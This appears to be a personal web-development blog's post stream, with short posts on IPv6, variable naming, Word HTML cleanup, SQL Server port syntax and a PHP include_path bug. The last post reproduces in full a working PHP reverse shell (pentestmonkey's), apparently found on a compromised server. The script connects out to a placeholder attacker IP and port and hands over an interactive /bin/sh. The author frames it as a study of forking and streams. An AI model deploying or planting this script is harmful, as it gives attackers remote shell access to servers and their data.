Defining Chaos In Order

As I firmly believe in the future of IPv6, and the urgency at which we need to teach ourselves and implement its services, I started the IP:v6:guide blog.

In time, it should feature all common protocols used by IPv6 with detailed explanation (readable text on the bits & bytes, not just for those highly schooled robots, but for humans like you and me), as well as examples.

Right now, it briefly describes the following topics.

• Starting IP:v6:guide
• Address Notations in IPv6
• Address Types: Unicast, Multicast & Anycast
• IPv6 Address Space & Reservations
• Neighbor Discovery (ND) To Replace ARP In IPv6
• Stateless Autoconfiguration To Replace DHCP For Some Systems

And it holds a place for proper IPv6 links, and IPv6 tools. Feel free to join in the comments, and drop me a message when you see something wrong, or have a request.

Matti Tech guide, IP, ipv4, ipv6

It happens to everyone. You’re typing hundreds and thousands of lines of code, and you suddenly find yourself stuck. You need to come up with the name of a new variable, and you can’t find one. It’s something so incredibly easy, yet you can’t think of a name for it.

That’s because deep down, you _know_ it’s not easy. You know this variable will come back to haunt you weeks later when you’re maintaining the code, and forgot what data it held. While there’s nothing as easy as naming all variables $a, $b, $c, … it just doesn’t cut it in the long term.

Let’s kick it off with some wrongfully named variable examples. Don’t use overly descriptive words in variable names. While the content of the variable may change, the variable’s name usually doesn’t. Take the following CSS snippet.

.left_content_green {
	color: green;
	padding: 5px;
}

While this might seem like a good idea, it’s really not. Since CSS is ment as a way to manage your site’s layout & mark-up in a centralized place, changing styles, content, … is a piece-of-cake through a couple of CSS files. But naming your class “left_content_green” will make it horribly complicated to maintain once you decide to change its color to red. You’re only supposed to change it in the CSS, not change the class name inside your project. Now your class called “left_content_green” is causing your content to turn red.

Be clear. While it may sound simple, clean and easy variable names apparently don’t come easy. Consider the following two pieces of code. Both perform the same action, yet one of them is remarkably easier to read & manage .

while (!$notRunning) {
	// Do something, until completed
}
 
while ($running) {
	// Do something, until completed
}

The first while-loop can cause confusion. A double negative (“while not NotRunning, do this”) will add complexity where it’s not needed. The second loop, stating “while running, do this” is both easier to understand, and to write.

Keep your variable name, datatype & content aligned. This mostly holds true for loosely defined languages, such as PHP, where you can change the datatype of a variable on-the-fly, without problems. Just don’t do this, for _whatever_ reason there might be (and I’ve seen this happen all too often).

// Start the script
$intStartingNumber = 5;
for ($i = 0; $i < $intStartingNumber; $i++) {
	echo $i;
}
 
// Add 15k+ lines of code ...
 
// Hey look, a variable $intStartingNumber that we haven't used in a while
$intStartingNumber = "five";
for ($j = 0; $j < 5; $j++) {
	echo $intStartingNumber;
}

If you don’t recognise the scenario above, consider yourself lucky. It’s a common mistake found in almost every PHP script. If you reuse your variable (which is fine – don’t get me wrong), make sure the variable is atleast still named properly.

Matti PHP convention, naming, PHP, variables

Here’s one of the features of Dreamweaver, to clean up the “HTML” (do mind the quotes!) that Microsoft’s Word generates when saving a document as a webpage file. 

Clean up Word HTML

And its purpose is clear; transform the why-do-they-even-call-it-HTML-code that Word generates, to a manageable and W3C compliant version. I suppose this results just sums it all up.

Clean up Word HTML Results

In case you’ve never done this before; take a random Word document, and save it as a .HTML file through the “save as” menu in Word. Then look at the HTML code behind that page. See if you can decypher any proper HTML tags …

Its results are often noticed when trying to copy/paste Word text to an online text editor. It’ll copy the underlying Word HTML characters as well, that often break the layout of pages.

Matti Webdevelopment convert, dreamweaver, word, xhtml

Since I didn’t find it right away, here’s the solution. The default notation “server:port” doesn’t work here (for God knows what reason). You need to seperate the hostname and port with a comma. Here’s an example.

SQL Server Alternate Port

What ever happened to the default point seperation? :-(

Matti Windows mssql, server, sql

If you want to overwrite certain settings for a particular directory, you can either use a .htaccess file or edit the apache config file. One of those changes, could be to alter the include_path for PHP for certain projects. Normally, you’d do this.

<Directory “/var/www/vhosts/xxx/httpdocs/”>
        php_admin_value include_path “/var/www/<loc>/:/usr/share/pear/:/tmp/”
</Directory>

You might run into some unexpected results, where the include_path isn’t actually changed, and the files you’re trying to include aren’t being included.

Try changing it to this.

<Directory “/var/www/vhosts/xxx/httpdocs/”>
        php_value include_path “/var/www/<loc>/:/usr/share/pear/:/tmp/”
</Directory>

There’s currently a known bug (#43677 [resolved]) that causes unexpected results when using the php_admin_value. A quick fix is changing this to php_value. Release 5.2.6 made a permanent fix for this, but not every commercial hoster or commercial controlpanel immediately updates to the latest release. If you see strange behaviour for PEAR packages that aren’t being included, despite setting the include_path correctly – this might be the reason.

Matti PHP PHP, php-bug, php_admin_value, php_value

This is definitely something worth checking out, #tweetcoding. Here’s the short description.

The idea was simple: See what people could code in 140 characters of AS3 [Action Script 3] (the number of characters in a single tweet). The results were unexpected: Hundreds of participants and entries, some of which are simply amazing.

And dear Lord, the results ARE amazing. I often couldn’t believe the magic that could be contained in a mere 140 characters worth of code. Granted, the scripts written don’t quite comply to the “basic rules” of coding, but that’s not the point. :-)

There aren’t many scripting/programming languages for which this could catch on, but Action Script’s ability to output these kind of visualizations makes this a perfect testcase.

Matti programming actionscript, tweetcoding, tweets, twitter

Here’s a very interesting PHP script found on a compromised Linux box. I won’t discuss how it got there (using/abusing exploits is not in the scope of this post, and shouldn’t be discussed in comments either).

Original credits for the author.

<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
//
// This tool may be used for legal purposes only.  Users take full responsibility
// for any actions performed using this tool.  The author accepts no liability
// for damage caused by this tool.  If these terms are not acceptable to you, then
// do not use this tool.
//
// In all other respects the GPL version 2 applies:
//
// This program is free software; you can redistribute it and/or modify
// it under the terms of the GNU General Public License version 2 as
// published by the Free Software Foundation.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License along
// with this program; if not, write to the Free Software Foundation, Inc.,
// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
//
// This tool may be used for legal purposes only.  Users take full responsibility
// for any actions performed using this tool.  If these terms are not acceptable to
// you, then do not use this tool.
//
// You are encouraged to send comments, improvements or suggestions to
// me at pentestmonkey@pentestmonkey.net
//
// Description
// -----------
// This script will make an outbound TCP connection to a hardcoded IP and port.
// The recipient will be given a shell running as the current user (apache normally).
//
// Limitations
// -----------
// proc_open and stream_set_blocking require PHP version 4.3+, or 5+
// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.
// Some compile-time options are needed for daemonisation (like pcntl, posix).  These are rarely available.
//
// Usage
// -----
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.

And now for the script itself. Let the magic begin!

set_time_limit (0);
$VERSION = "1.0";
$ip = 'xxx.xxx.xxx.xxx';  // CHANGE THIS
$port = 8080;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
 
//
// Daemonise ourself if possible to avoid zombies later
//
 
// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies.  Worth a try...
if (function_exists('pcntl_fork')) {
	// Fork and have the parent process exit
	$pid = pcntl_fork();
 
	if ($pid == -1) {
		printit("ERROR: Can't fork");
		exit(1);
	}
 
	if ($pid) {
		exit(0);  // Parent exits
	}
 
	// Make the current process a session leader
	// Will only succeed if we forked
	if (posix_setsid() == -1) {
		printit("Error: Can't setsid()");
		exit(1);
	}
 
	$daemon = 1;
} else {
	printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}
 
// Change to a safe directory
chdir("/");
 
// Remove any umask we inherited
umask(0);
 
//
// Do the reverse shell...
//
 
// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
	printit("$errstr ($errno)");
	exit(1);
}
 
// Spawn shell process
$descriptorspec = array(
   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);
 
$process = proc_open($shell, $descriptorspec, $pipes);
 
if (!is_resource($process)) {
	printit("ERROR: Can't spawn shell");
	exit(1);
}
 
// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
 
printit("Successfully opened reverse shell to $ip:$port");
 
while (1) {
	// Check for end of TCP connection
	if (feof($sock)) {
		printit("ERROR: Shell connection terminated");
		break;
	}
 
	// Check for end of STDOUT
	if (feof($pipes[1])) {
		printit("ERROR: Shell process terminated");
		break;
	}
 
	// Wait until a command is end down $sock, or some
	// command output is available on STDOUT or STDERR
	$read_a = array($sock, $pipes[1], $pipes[2]);
	$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
 
	// If we can read from the TCP socket, send
	// data to process's STDIN
	if (in_array($sock, $read_a)) {
		if ($debug) printit("SOCK READ");
		$input = fread($sock, $chunk_size);
		if ($debug) printit("SOCK: $input");
		fwrite($pipes[0], $input);
	}
 
	// If we can read from the process's STDOUT
	// send data down tcp connection
	if (in_array($pipes[1], $read_a)) {
		if ($debug) printit("STDOUT READ");
		$input = fread($pipes[1], $chunk_size);
		if ($debug) printit("STDOUT: $input");
		fwrite($sock, $input);
	}
 
	// If we can read from the process's STDERR
	// send data down tcp connection
	if (in_array($pipes[2], $read_a)) {
		if ($debug) printit("STDERR READ");
		$input = fread($pipes[2], $chunk_size);
		if ($debug) printit("STDERR: $input");
		fwrite($sock, $input);
	}
}
 
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
 
// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
	if (!$daemon) {
		print "$stringn";
	}
}
 
?>

It shows interesting usage of process forking and output/input stream usage. All credits go to the original creator, his info can be found inside the script or on his website.

Matti PHP forking, PHP, shell, streams